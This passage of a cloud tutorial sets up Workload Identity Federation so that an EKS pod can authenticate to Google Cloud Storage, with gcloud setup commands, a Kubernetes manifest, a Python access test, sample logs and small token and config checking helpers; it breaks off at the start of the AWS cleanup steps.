gcloud iam workload-identity-pools providers create-oidc eks-provider &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--location&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;global &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--workload-identity-pool&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;eks-pool &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--issuer-uri&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="nv"&gt;OIDC_ISSUER&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--allowed-audiences&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"//iam.googleapis.com/projects/&lt;/span&gt;&lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="nv"&gt;PROJECT_NUMBER&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt;&lt;span class="s2"&gt;/locations/global/workloadIdentityPools/eks-pool/providers/eks-provider"&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--attribute-mapping&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"google.subject=assertion.sub,attribute.namespace=assertion['kubernetes.io']['namespace'],attribute.service_account=assertion['kubernetes.io']['serviceaccount']['name']"&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--attribute-condition&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"assertion.sub.startsWith('system:serviceaccount:default:eks-cross-cloud-sa')"&lt;/span&gt;

&lt;span class="c"&gt;# 4. Create GCP Service Account&lt;/span&gt;
gcloud iam service-accounts create eks-gcp-sa &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--display-name&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"EKS to GCP Service Account"&lt;/span&gt;

&lt;span class="nv"&gt;GSA_EMAIL&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"eks-gcp-sa@&lt;/span&gt;&lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="nv"&gt;PROJECT_ID&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt;&lt;span class="s2"&gt;.iam.gserviceaccount.com"&lt;/span&gt;

&lt;span class="c"&gt;# 5. Create bucket and Grant GCS permissions&lt;/span&gt;
gcloud storage buckets create gs://eks-cross-cloud &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--project&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="nv"&gt;PROJECT_ID&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--location&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;us-central1 &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--uniform-bucket-level-access&lt;/span&gt;

gsutil iam ch serviceAccount:&lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="nv"&gt;GSA_EMAIL&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt;:objectViewer gs://eks-cross-cloud

&lt;span class="c"&gt;# list buckets in the project:&lt;/span&gt;
gcloud projects add-iam-policy-binding &lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="nv"&gt;PROJECT_ID&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--member&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"serviceAccount:&lt;/span&gt;&lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="nv"&gt;GSA_EMAIL&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--role&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"roles/storage.admin"&lt;/span&gt;

&lt;span class="c"&gt;# 6. Allow Kubernetes SA to impersonate GCP SA&lt;/span&gt;
gcloud iam service-accounts add-iam-policy-binding &lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="nv"&gt;GSA_EMAIL&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--role&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;roles/iam.workloadIdentityUser &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--member&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"principalSet://iam.googleapis.com/projects/&lt;/span&gt;&lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="nv"&gt;PROJECT_NUMBER&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt;&lt;span class="s2"&gt;/locations/global/workloadIdentityPools/eks-pool/attribute.service_account/eks-cross-cloud-sa"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
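&lt;p&gt;Before wiring the pod up, you can sanity-check that the projected service account token's claims will satisfy the attribute mapping and attribute condition configured above. The sketch below decodes a JWT payload without verifying the signature; the claim values are synthetic stand-ins shaped like an EKS projected token, not output captured from a real cluster.&lt;/p&gt;

```python
import base64
import json

def decode_jwt_claims(token: str) -> dict:
    """Decode the payload of a JWT without verifying its signature.

    Good enough for inspecting claims locally; never skip signature
    verification in a production code path.
    """
    payload_b64 = token.split(".")[1]
    # JWT segments are base64url-encoded without padding; restore it.
    payload_b64 += "=" * (-len(payload_b64) % 4)
    return json.loads(base64.urlsafe_b64decode(payload_b64))

# Synthetic claims shaped like a Kubernetes projected SA token (illustrative).
claims = {
    "sub": "system:serviceaccount:default:eks-cross-cloud-sa",
    "aud": ["//iam.googleapis.com/projects/123/locations/global/"
            "workloadIdentityPools/eks-pool/providers/eks-provider"],
    "kubernetes.io": {
        "namespace": "default",
        "serviceaccount": {"name": "eks-cross-cloud-sa"},
    },
}
header = base64.urlsafe_b64encode(json.dumps({"alg": "RS256"}).encode()).rstrip(b"=")
payload = base64.urlsafe_b64encode(json.dumps(claims).encode()).rstrip(b"=")
token = b".".join([header, payload, b"sig"]).decode()

decoded = decode_jwt_claims(token)
# The attribute condition above requires sub to start with this prefix.
assert decoded["sub"].startswith("system:serviceaccount:default:eks-cross-cloud-sa")
print(decoded["kubernetes.io"]["serviceaccount"]["name"])  # eks-cross-cloud-sa
```

&lt;p&gt;On a real cluster, you would read the token from the projected volume path and check that &lt;code&gt;sub&lt;/code&gt; and &lt;code&gt;aud&lt;/code&gt; line up with the provider's &lt;code&gt;--attribute-condition&lt;/code&gt; and &lt;code&gt;--allowed-audiences&lt;/code&gt;.&lt;/p&gt;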



&lt;p&gt;&lt;strong&gt;Kubernetes Manifest:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Submit the manifest below to validate Scenario 1.3. If authentication is working, you will see success logs like the ones shown below.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="c1"&gt;# scenario1-3-eks-to-gcp.yaml&lt;/span&gt;
&lt;span class="na"&gt;apiVersion&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;v1&lt;/span&gt;
&lt;span class="na"&gt;kind&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Pod&lt;/span&gt;
&lt;span class="na"&gt;metadata&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;eks-gcp-test&lt;/span&gt;
  &lt;span class="na"&gt;namespace&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;default&lt;/span&gt;
&lt;span class="na"&gt;spec&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="c1"&gt;# eks-cross-cloud-sa SA is created in Scenario 1.1 above&lt;/span&gt;
  &lt;span class="na"&gt;serviceAccountName&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;eks-cross-cloud-sa&lt;/span&gt;
  &lt;span class="na"&gt;restartPolicy&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Never&lt;/span&gt;
  &lt;span class="na"&gt;containers&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;gcp-test&lt;/span&gt;
    &lt;span class="na"&gt;image&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;python:3.11-slim&lt;/span&gt;
    &lt;span class="na"&gt;command&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s"&gt;sh&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s"&gt;-c&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="pi"&gt;|&lt;/span&gt;
        &lt;span class="s"&gt;pip install --no-cache-dir google-auth google-cloud-storage &amp;amp;&amp;amp; \&lt;/span&gt;
        &lt;span class="s"&gt;python /app/test_gcp_from_eks.py&lt;/span&gt;
    &lt;span class="na"&gt;env&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;GOOGLE_APPLICATION_CREDENTIALS&lt;/span&gt;
      &lt;span class="na"&gt;value&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;/var/run/secrets/workload-identity/config.json&lt;/span&gt;
    &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;GCP_PROJECT_ID&lt;/span&gt;
      &lt;span class="c1"&gt;# replace YOUR_PROJECT_ID with actual value&lt;/span&gt;
      &lt;span class="na"&gt;value&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;YOUR_PROJECT_ID"&lt;/span&gt;
    &lt;span class="na"&gt;volumeMounts&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;workload-identity-config&lt;/span&gt;
      &lt;span class="na"&gt;mountPath&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;/var/run/secrets/workload-identity&lt;/span&gt;
      &lt;span class="na"&gt;readOnly&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;
    &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;ksa-token&lt;/span&gt;
      &lt;span class="na"&gt;mountPath&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;/var/run/secrets/tokens&lt;/span&gt;
      &lt;span class="na"&gt;readOnly&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;
    &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;app-code&lt;/span&gt;
      &lt;span class="na"&gt;mountPath&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;/app&lt;/span&gt;
      &lt;span class="na"&gt;readOnly&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;
  &lt;span class="na"&gt;volumes&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;workload-identity-config&lt;/span&gt;
    &lt;span class="na"&gt;configMap&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;gcp-workload-identity-config&lt;/span&gt;
  &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;app-code&lt;/span&gt;
    &lt;span class="na"&gt;configMap&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;gcp-test-code&lt;/span&gt;
  &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;ksa-token&lt;/span&gt;
    &lt;span class="na"&gt;projected&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="na"&gt;sources&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;serviceAccountToken&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
          &lt;span class="na"&gt;path&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;eks-token&lt;/span&gt;
          &lt;span class="na"&gt;expirationSeconds&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="m"&gt;3600&lt;/span&gt;
          &lt;span class="c1"&gt;# replace PROJECT_NUMBER with actual value&lt;/span&gt;
          &lt;span class="na"&gt;audience&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;//iam.googleapis.com/projects/PROJECT_NUMBER/locations/global/workloadIdentityPools/eks-pool/providers/eks-provider"&lt;/span&gt;
&lt;span class="nn"&gt;---&lt;/span&gt;
&lt;span class="na"&gt;apiVersion&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;v1&lt;/span&gt;
&lt;span class="na"&gt;kind&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;ConfigMap&lt;/span&gt;
&lt;span class="na"&gt;metadata&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;gcp-workload-identity-config&lt;/span&gt;
  &lt;span class="na"&gt;namespace&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;default&lt;/span&gt;
&lt;span class="na"&gt;data&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="c1"&gt;# replace YOUR_PROJECT_ID and PROJECT_NUMBER with actual values&lt;/span&gt;
  &lt;span class="na"&gt;config.json&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;|&lt;/span&gt;
    &lt;span class="s"&gt;{&lt;/span&gt;
      &lt;span class="s"&gt;"type": "external_account",&lt;/span&gt;
      &lt;span class="s"&gt;"audience": "//iam.googleapis.com/projects/PROJECT_NUMBER/locations/global/workloadIdentityPools/eks-pool/providers/eks-provider",&lt;/span&gt;
      &lt;span class="s"&gt;"subject_token_type": "urn:ietf:params:oauth:token-type:jwt",&lt;/span&gt;
      &lt;span class="s"&gt;"token_url": "https://sts.googleapis.com/v1/token",&lt;/span&gt;
      &lt;span class="s"&gt;"service_account_impersonation_url": "https://iamcredentials.googleapis.com/v1/projects/-/serviceAccounts/eks-gcp-sa@YOUR_PROJECT_ID.iam.gserviceaccount.com:generateAccessToken",&lt;/span&gt;
      &lt;span class="s"&gt;"credential_source": {&lt;/span&gt;
        &lt;span class="s"&gt;"file": "/var/run/secrets/tokens/eks-token"&lt;/span&gt;
      &lt;span class="s"&gt;}&lt;/span&gt;
    &lt;span class="s"&gt;}&lt;/span&gt;
&lt;span class="s"&gt;---&lt;/span&gt;
&lt;span class="na"&gt;apiVersion&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;v1&lt;/span&gt;
&lt;span class="na"&gt;kind&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;ConfigMap&lt;/span&gt;
&lt;span class="na"&gt;metadata&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;gcp-test-code&lt;/span&gt;
  &lt;span class="na"&gt;namespace&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;default&lt;/span&gt;
&lt;span class="na"&gt;data&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;test_gcp_from_eks.py&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;|&lt;/span&gt;
    &lt;span class="s"&gt;# Code will be provided below&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Test Code (Python):&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="c1"&gt;# test_gcp_from_eks.py
&lt;/span&gt;&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;os&lt;/span&gt;
&lt;span class="kn"&gt;from&lt;/span&gt; &lt;span class="n"&gt;google.auth&lt;/span&gt; &lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;default&lt;/span&gt;
&lt;span class="kn"&gt;from&lt;/span&gt; &lt;span class="n"&gt;google.cloud&lt;/span&gt; &lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;storage&lt;/span&gt;
&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;sys&lt;/span&gt;

&lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;test_gcp_access&lt;/span&gt;&lt;span class="p"&gt;():&lt;/span&gt;
    &lt;span class="k"&gt;try&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="n"&gt;credentials&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;project&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;default&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;

        &lt;span class="n"&gt;storage_client&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;storage&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nc"&gt;Client&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;
            &lt;span class="n"&gt;credentials&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;credentials&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
            &lt;span class="n"&gt;project&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;os&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;environ&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;get&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;GCP_PROJECT_ID&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="p"&gt;)&lt;/span&gt;

        &lt;span class="n"&gt;buckets&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;list&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;storage_client&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;list_buckets&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;max_results&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="mi"&gt;5&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;

        &lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;GCP Authentication successful!&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sa"&gt;f&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;Found &lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="nf"&gt;len&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;buckets&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="s"&gt; GCS buckets:&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;bucket&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="n"&gt;buckets&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
            &lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sa"&gt;f&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;  - &lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="n"&gt;bucket&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;name&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

        &lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sa"&gt;f&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;Authenticated with project: &lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="n"&gt;project&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="bp"&gt;True&lt;/span&gt;

    &lt;span class="k"&gt;except&lt;/span&gt; &lt;span class="nb"&gt;Exception&lt;/span&gt; &lt;span class="k"&gt;as&lt;/span&gt; &lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sa"&gt;f&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;GCP Authentication failed: &lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="nf"&gt;str&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;traceback&lt;/span&gt;
        &lt;span class="n"&gt;traceback&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;print_exc&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="bp"&gt;False&lt;/span&gt;

&lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;__name__&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;__main__&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
    &lt;span class="n"&gt;success&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;test_gcp_access&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
    &lt;span class="n"&gt;sys&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;exit&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt; &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;success&lt;/span&gt; &lt;span class="k"&gt;else&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Success logs:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;If you see logs like the following for the pod (&lt;code&gt;kubectl logs -f -n default eks-gcp-test&lt;/code&gt;), the EKS to GCP authentication worked.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;GCP Authentication successful!
Found &amp;lt;number&amp;gt; GCS buckets:
  - bucket-1
  - bucket-2
  - ...

Authenticated with project: None
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Important Note:&lt;/strong&gt; &lt;code&gt;project: None&lt;/code&gt; in the output is expected when using external account credentials. The active project is determined by the client configuration, not the credential itself.&lt;/p&gt;
&lt;/blockquote&gt;
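&lt;p&gt;A common failure mode is a malformed &lt;code&gt;config.json&lt;/code&gt;. The sketch below is a hypothetical pre-flight validator for the external account credential shape used above; the field names match the config shown in the ConfigMap, but the helper itself is illustrative, not part of &lt;code&gt;google-auth&lt;/code&gt;.&lt;/p&gt;

```python
import json

# Fields google-auth requires to recognize an external_account credential.
REQUIRED_FIELDS = {
    "type", "audience", "subject_token_type",
    "token_url", "credential_source",
}

def validate_external_account(config_text: str) -> list:
    """Return a list of problems found in an external_account config."""
    problems = []
    cfg = json.loads(config_text)
    missing = REQUIRED_FIELDS - cfg.keys()
    if missing:
        problems.append(f"missing fields: {sorted(missing)}")
    if cfg.get("type") != "external_account":
        problems.append("type must be 'external_account'")
    # The subject token is read from this file (the projected KSA token).
    source = cfg.get("credential_source", {})
    if "file" not in source and "url" not in source:
        problems.append("credential_source needs a 'file' or 'url' key")
    return problems

config = """{
  "type": "external_account",
  "audience": "//iam.googleapis.com/projects/123/locations/global/workloadIdentityPools/eks-pool/providers/eks-provider",
  "subject_token_type": "urn:ietf:params:oauth:token-type:jwt",
  "token_url": "https://sts.googleapis.com/v1/token",
  "credential_source": {"file": "/var/run/secrets/tokens/eks-token"}
}"""

print(validate_external_account(config))  # []
```

&lt;p&gt;Note that the credential file itself carries no project ID, which is why &lt;code&gt;google.auth.default()&lt;/code&gt; reports &lt;code&gt;project: None&lt;/code&gt; as described above.&lt;/p&gt;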




&lt;h3&gt;
  
  
  Scenario 1 Cleanup
&lt;/h3&gt;

&lt;p&gt;After testing Scenario 1 (EKS cross-cloud authentication), clean up the resources:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# ============================================&lt;/span&gt;
&lt;span class="c"&gt;# AWS Resources Cleanup&lt;/span&gt;
&lt;span class="c"&gt;# ============================================&lt;/span&gt;

&lt;span class="c"&gt;# Delete IAM role policy attachments&lt;/span&gt;
aws iam detach-role-policy &lt;span class="se"&gt;\&lt;/span&gt;
